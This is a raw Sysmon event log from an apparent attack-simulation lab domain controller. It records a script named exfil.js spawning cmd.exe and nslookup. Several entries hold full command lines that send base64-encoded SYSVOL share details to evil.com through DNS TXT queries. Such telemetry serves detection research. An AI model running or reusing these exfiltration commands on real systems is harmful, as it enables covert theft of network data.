14:16:20.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.827{2E1864BB-17A1-629A-783D-000000005F02}55523288C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-3A3F-000000005F02}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.828{2E1864BB-17B4-629A-3A3F-000000005F02}6008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljsis.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.811{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvqu.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-17B4-629A-383F-000000005F02}16764212C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-393F-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-393F-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.790{2E1864BB-17B4-629A-373F-000000005F02}7245232C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-393F-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.797{2E1864BB-17B4-629A-393F-000000005F02}5216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-373F-000000005F02}724C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvqu.tmp 2>&1 10341000x8000000000000000197448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.758{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-383F-000000005F02}1676C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.758{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-383F-000000005F02}1676C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.758{2E1864BB-17B4-629A-383F-000000005F02}16764212C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-373F-000000005F02}724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.743{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-383F-000000005F02}1676C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.727{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-373F-000000005F02}724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.727{2E1864BB-17A1-629A-783D-000000005F02}55523968C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-373F-000000005F02}724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.742{2E1864BB-17B4-629A-373F-000000005F02}724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvqu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.727{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeab.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-17B4-629A-353F-000000005F02}59687632C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-363F-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-363F-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-17B4-629A-343F-000000005F02}50646652C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-363F-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 